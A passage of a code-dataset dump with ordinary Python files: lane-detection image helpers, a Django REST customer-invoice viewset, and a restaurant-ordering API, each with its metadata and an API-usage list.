#ym_per_pix = 30 / 720 # meters per pixel in y dimension\n #xm_per_pix = 3.7 / 700 # meters per pixel in x dimension\n\n # Fit new polynomials to x,y in world space\n left_fit_cr = np.polyfit(ploty * ym_per_pix, leftx * xm_per_pix, 2)\n right_fit_cr = np.polyfit(ploty * ym_per_pix, rightx * xm_per_pix, 2)\n # Calculate the new radii of curvature\n left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * left_fit_cr[0])\n right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(\n 2 * right_fit_cr[0])\n\n return left_curverad, right_curverad\n\ndef draw(undist, image, warped, left_fitx, right_fitx, ploty, Minv, left_curverad, right_curverad, line_base_pos, detected, left_curverad_current, right_curverad_current, line_base_pos_current, straightAway=False):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n # Warp 
the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (image.shape[1], image.shape[0]))\n # Combine the result with the original image\n result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n plt.imshow(result)\n\n # write curvature and position findings\n font = cv2.FONT_HERSHEY_SIMPLEX\n fontColor = (255, 255, 255)\n if(not detected):\n fontColor = (255,0,0)\n cv2.putText(result, 'Radius of left line curvature: ' + str(left_curverad) + ' compared to '+str(left_curverad_current)+ ' m', (50, 20), font, 1, fontColor, 2, cv2.LINE_AA)\n cv2.putText(result, 'Radius of right line curvature: ' + str(right_curverad) + ' compared to '+str(right_curverad_current)+ ' m', (50, 50), font, 1, fontColor, 2,\n cv2.LINE_AA)\n cv2.putText(result, 'Vehicle position : %.2f m %s of center compared to %s' % (abs(line_base_pos), 'left' if line_base_pos < 0 else 'right', str(line_base_pos_current)), (50, 80),\n font, 1, fontColor, 2, cv2.LINE_AA)\n if(straightAway):\n cv2.putText(result, 'Straight Lanes Detected', (50, 100), font, 1, fontColor, 2, cv2.LINE_AA)\n\n return result\n\ndef get_vehicle_position(image, left_fitx, right_fitx, xm_per_pix):\n # determine vehicle position\n vehicle_pos = image.shape[1] // 2\n middle = (left_fitx[-1] + right_fitx[-1]) // 2\n line_base_pos = (vehicle_pos - middle) * xm_per_pix\n\n return line_base_pos\n\n\n", "sub_path": "Helper_Functions.py", "file_name": "Helper_Functions.py", "file_ext": "py", "file_size_in_byte": 26825, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 37, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.Sobel", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.absolute", "line_number": 115, "usage_type": "call"}, 
{"api_name": "cv2.Sobel", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2GRAY", "line_number": 149, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.CV_64F", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 164, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2HLS", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 225, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 233, "usage_type": "attribute"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 239, "usage_type": "call"}, 
{"api_name": "numpy.linspace", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 271, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 354, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 359, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 372, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 375, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 376, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 376, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 377, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 378, "usage_type": "call"}, 
{"api_name": "matplotlib.pyplot", "line_number": 378, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 379, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 380, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 380, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 381, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 381, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 382, "usage_type": "name"}, {"api_name": "numpy.dstack", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 394, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 397, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 398, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 401, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 402, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 402, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 403, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 416, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 422, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 425, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 465, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 477, "usage_type": "attribute"}, {"api_name": 
"numpy.zeros_like", "line_number": 478, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 479, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 479, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 479, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 480, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 481, "usage_type": "attribute"}, {"api_name": "cv2.addWeighted", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 486, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 486, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.absolute", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 516, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 520, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.flipud", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 521, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 522, "usage_type": "call"}, {"api_name": "cv2.fillPoly", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.int_", "line_number": 525, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 528, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 534, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 538, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 538, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 539, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 540, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 541, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 542, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 544, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 544, "usage_type": "attribute"}]}
+{"seq_id": "509688631", "text": "from rest_framework import filters, mixins, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAdminUser\nfrom sreps.api.v1.serializers.customer import CustomerSerializer\nfrom sreps.api.v1.serializers.invoice import InvoiceListSerializer\nfrom sreps.core.models import Customer, Invoice\n\n\nclass CustomerViewSet(\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.GenericViewSet,):\n\n queryset = Customer.objects.all()\n serializer_class = CustomerSerializer\n permission_classes = (IsAdminUser,)\n\n @action(detail=True, methods=['GET'], name='Customer invoices')\n def invoices(self, request, pk=None):\n \"\"\"Get invoices made by a customer.\"\"\"\n\n customer = get_object_or_404(self.queryset, pk=pk)\n\n invoices = Invoice.objects.filter(\n customer=customer).order_by('-datetime_created')\n serializer = InvoiceListSerializer(invoices, many=True)\n\n return Response(serializer.data)\n", "sub_path": "sreps/api/v1/views/customer.py", "file_name": "customer.py", "file_ext": "py", "file_size_in_byte": 1105, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 11, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 12, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 15, "usage_type": "name"}, {"api_name": "sreps.core.models.Customer.objects.all", "line_number": 17, "usage_type": "call"}, {"api_name": "sreps.core.models.Customer.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Customer", "line_number": 17, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.customer.CustomerSerializer", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 19, "usage_type": "name"}, {"api_name": "sreps.core.models.Invoice.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "sreps.core.models.Invoice.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sreps.core.models.Invoice", "line_number": 27, "usage_type": "name"}, {"api_name": "sreps.api.v1.serializers.invoice.InvoiceListSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "89568133", "text": "from django.contrib.auth.hashers import check_password\nfrom rest_framework import viewsets, status, mixins\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.utils import json\nfrom django.forms.models import model_to_dict\nfrom django.db.models import ObjectDoesNotExist\nimport logging\nfrom ServeUp.Views.helper import *\n\nclass NarociloViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Narocilo.objects.all()\n serializer_class = NarociloSerializer\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n Returns all orders for restaurant with specified id in GET parameter 'id_restavracija'.\n\n ORDER_NEW = 0 # \"Nova Naročila\"\n ORDER_PREPARING = 1 # \"V Pripravi\"\n ORDER_DONE = 2 # \"Pripravljeno\"\n ORDER_FINISHED = 3 # \"Končano\"\n \"\"\"\n get_params = request.query_params\n response = {}\n return_data = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n data = JediNarocilaPodatki.objects.filter(id_restavracija=id_restavracija,\n status__in=[ORDER_NEW, ORDER_DONE, ORDER_PREPARING, ORDER_FINISHED])\n data = JediNarocilaPodatkiSerializer(data, many=True).data\n\n for order in data:\n id_narocila = order['id_narocila']\n if id_narocila not in return_data:\n return_data[id_narocila] = {\n 'cas_prevzema': order['cas_prevzema'],\n 'cas_narocila': order['cas_narocila'],\n 'id_restavracija': order['id_restavracija'],\n 'id_uporabnik': order['id_uporabnik'],\n 'cena': 0,\n 'id_narocila': order['id_narocila'],\n 'status': order['status'],\n 'checked_in': order['checked_in'],\n 'id_miza': order['id_miza'],\n 'jedi': []\n }\n\n return_data[id_narocila]['jedi'].append({\n 'id_jed': order['id_jed'],\n 'ime_jedi': order['ime_jedi'],\n 'kolicina': order['kolicina'],\n 'cena': order['cena']\n })\n return_data[id_narocila]['cena'] += order['cena']\n\n response['status'] = 1\n response['data'] = list(return_data.values())\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['GET'])\n def refresh(self, request):\n \"\"\"\n Returns new and cancelled orders for a restaurant\n GET params:\n id_restavracija: id of the restaurant to refresh orders\n \"\"\"\n get_params = request.query_params\n response = {}\n\n try:\n id_restavracija = get_params['id_restavracija']\n except KeyError:\n response['status'] = 0\n response['description'] = \"Missing id, add ?id_restavracija=x to call\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n new, cancelled, checked_in = get_new_cancelled_checked_in_orders(int(id_restavracija))\n response['status'] = 1\n response['new_orders'] = new\n response['cancelled_orders'] = cancelled\n response['checked_in_orders'] = checked_in\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def cancel_order(self, request):\n \"\"\"\n Receive order id and delete that order from the database effectively cancelling it.\n Add the order id to the cancelled orders list\n Return conformation of action or error.\n \"\"\"\n response = {}\n data = json.load(request)\n try:\n order_id = 
data['id_narocilo']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # noinspection PyBroadException\n try:\n narocilo = Narocilo.objects.get(id_narocila=order_id)\n order = {'id_narocila': narocilo.id_narocila, 'id_restavracija': narocilo.id_restavracija.id_restavracija}\n narocilo.delete()\n add_cancelled_order(order)\n response['status'] = 1\n response['description'] = \"Successfully deleted order\"\n return Response(response, status=status.HTTP_200_OK)\n except Exception:\n response['status'] = 0\n response['description'] = \"Could not delete order {}\".format(order_id)\n return Response(response, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n\n @action(detail=False, methods=['POST'])\n def new_order(self, request):\n \"\"\"\n The function receives JSON data with the details of a new order and stores it.\n Return values\n status: 0 - Error, 1 - Successfully added\n description: Short description of Error or confirm desired action\n \"\"\"\n response = {}\n data = json.load(request)\n\n try:\n order = {\n \"cas_prevzema\": data['cas_prevzema'],\n \"cas_narocila\": data['cas_narocila'],\n \"id_restavracija\": data['id_restavracija'],\n \"id_uporabnik\": data['id_uporabnik'],\n \"status\": ORDER_NEW,\n \"checked_in\": False\n }\n meals = data['jedi']\n except KeyError as e:\n response['status'] = 0\n response['description'] = \"Missing key data \" + str(e) + \"\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n if len(meals) == 0: # If there are no meals, the order is incorrectly formatted\n response['status'] = 0\n response['description'] = \"No meal data\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=order)\n if serializer.is_valid():\n narocilo = serializer.save()\n id_narocila = narocilo.id_narocila\n\n success, price = add_meals_to_order(meals, id_narocila)\n if not success: # Something went wrong, delete order\n narocilo.delete()\n response['status'] = 0\n response['description'] = \"Could not insert meals\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n order['cena'] = price\n order['id_narocila'] = id_narocila\n order['jedi'] = meals\n add_new_order(order)\n response['status'] = 1\n response['description'] = \"New order created\"\n return Response(response, status=status.HTTP_201_CREATED)\n else:\n response['status'] = 0\n response['description'] = \"Could not add new order\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n @action(detail=False, methods=['POST'])\n def status_update(self, request):\n response = {'status': \"\",\n 'description': \"\"}\n order = Narocilo.objects.get(id_narocila=request.data['id_narocilo'])\n data = model_to_dict(order)\n data[\"status\"] = request.data[\"status\"]\n\n if not 0 <= request.data[\"status\"] <= 3:\n response['status'] = 0\n response['description'] = \"Invalid status value\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n serializer = NarociloSerializer(data=data, instance=order)\n if serializer.is_valid():\n serializer.save()\n response['status'] = 1\n response['description'] = \"Successfully changed status\"\n return Response(response, status=status.HTTP_200_OK)\n else:\n response['status'] = 0\n response['description'] = serializer.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RestavracijaViewSet(viewsets.ModelViewSet):\n \"\"\"\n ViewSet 
provides 'list', 'create', 'retrieve', 'update' and 'destroy' actions\n\n Additional actions can be added using '@action()' decorator, default response\n is GET, you can add POST using 'methods' argument\n \"\"\"\n queryset = Restavracija.objects.all()\n serializer_class = RestavracijaSerializer\n\n @action(detail=False, methods=['POST'])\n def home(self, request):\n \"\"\"\n The function receives JSON data with the name of a city.\n Return all restaurants in given city.\n Return values\n status: 0 - Error\n description: Short description of Error or confirm desired action\n\n If valid input return only array of restaurants, request by Urban.\n \"\"\"\n response = {}\n try:\n location = request.data['location']\n except KeyError:\n location = None\n\n if location is None:\n response['status'] = 0\n response['description'] = \"Error: Please input the location\"\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n else:\n response = get_restaurants(location)\n return Response(response, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['POST'])\n def register(self, request):\n \"\"\"\n The function receives JSON data with the admin email, restaurant name,\n restaurant type, address and rating\n Return values\n status: 0 - Error, 1 - OK\n description: Short description of Error or confirm desired action\n additional actions: Set of actions that also had to be performed, e.g. updating address table\n \"\"\"\n response = {'status': \"\",\n 'description': \"\",\n 'additional actions': \"\"}\n\n # Get admin id\n id_admin = AdminUporabnik.objects.get(email=request.data['email']).id\n\n # Deal with address id\n requested_data = request.data['naslov'].split(', ')\n address = requested_data[0].split(' ')\n post = requested_data[1].split(' ')\n\n try:\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n except Naslov.DoesNotExist:\n naslov_data = {'ulica': \" \".join(address[:-1]),\n 'hisna_stevilka': address[-1],\n 'postna_stevilka': post[0]}\n\n # Add post to Posta table, if it doesn't exist\n try:\n Posta.objects.get(postna_stevilka=post[0])\n except Posta.DoesNotExist:\n posta_data = {'postna_stevilka': post[0], 'kraj': post[1]}\n serializer_posta = PostaSerializer(data=posta_data)\n if serializer_posta.is_valid():\n serializer_posta.save()\n response['additional actions'] += \"\\nUpdated Posta table\"\n else:\n response['status'] = 0\n response['description'] = serializer_posta.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n\n # Add address to Naslov table, if it doesn't exist\n serializer_naslov = NaslovSerializer(data=naslov_data)\n if serializer_naslov.is_valid():\n serializer_naslov.save()\n response['additional actions'] += \"\\nUpdated Address table\"\n else:\n response['status'] = 0\n response['description'] = serializer_naslov.errors\n return Response(response, status=status.HTTP_400_BAD_REQUEST)\n id_address = Naslov.objects.get(ulica=\" \".join(address[:-1]), hisna_stevilka=address[-1]).id_naslov\n\n # Build JSON object\n data = {'id_admin': id_admin,\n 'ime_restavracije': request.data['ime_restavracije'],\n 'id_tip_restavracije': request.data['id_tip_restavracije'],\n 